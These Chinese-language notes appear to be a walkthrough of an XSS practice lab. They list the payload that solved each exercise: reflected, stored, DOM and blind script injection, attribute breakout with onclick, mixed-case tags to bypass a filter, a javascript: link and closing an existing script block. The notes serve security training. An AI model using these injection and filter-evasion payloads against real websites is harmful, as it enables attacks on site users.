get
message=<script>alert("123")</script>&submit=submit
post
可以暴力破解账号密码,但由于是XSS练习,点右上角的提示,就可以登陆
直接在输入框中输入
<script>alert("123")</script>
存储型
<script>alert("123")</script>
DOM
随意输入可以看到提示
进入源码找到提示,将标签闭合
' onclick="alert('123')"
xss-x
同样的语句,链接点两次
盲打
在留言板输入,发现没有变化,在提示中看到登陆后台
<script>alert("456")</script>
在后台可以看到弹窗
过滤
输入发现被过滤
大小写混合,成功
<SCriPt>alert("123")</sCrIPt>
html
可以看到源码时链接
输入
javascript:alert(/xss/)
href
输入上一个,点击链接即可
js输出
看到源码是一个script语句,将前面的闭合,再写一个新的弹窗
</script><script>alert("123")</script>